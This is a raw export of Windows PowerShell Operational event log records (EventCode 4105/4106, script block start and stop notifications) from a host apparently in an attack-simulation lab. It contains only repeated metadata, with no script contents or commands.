06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473417
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473416
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473414
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473413
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473412
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473411
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473410
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473409
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473408
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473407
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473406
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473405
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473404
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473403
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473402
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473401
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473400
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473399
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473398
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473397
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473396
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473395
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473394
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473393
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473392
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473391
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473390
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473389
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473388
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473387
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473386
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473385
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473384
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473383
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473382
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473381
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473380
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473379
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473378
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473377
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473376
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473375
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473374
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473373
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473372
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473371
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473370
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473369
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473368
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473367
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473366
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473365
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473364
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473363
Keywords=None
